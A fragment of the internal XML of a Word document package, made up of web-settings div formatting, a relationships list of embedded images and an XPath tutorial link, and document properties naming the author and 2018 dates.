        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="857697339">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1055810626">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1211453002">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1290211846">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="483661023">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1388187351">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1515916754">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1665206345">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1733382128">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1959532234">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1976523956">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2009794303">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2020544446">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2125536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image" Target="media/image57.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.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hyperlink" Target="http://www.w3school.com.cn/xpath/index.asp" TargetMode="External"/><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74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.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image" Target="media/image71.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><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83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.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png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.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41689-21E8-45B9-9D7A-0BB73B49B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95</Words>
  <Characters>19354</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>161</Lines>
  <Paragraphs>45</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>22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o fq</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Guo fq</cp:lastModifiedBy>
  <cp:revision>65</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-09T01:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-18T09:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>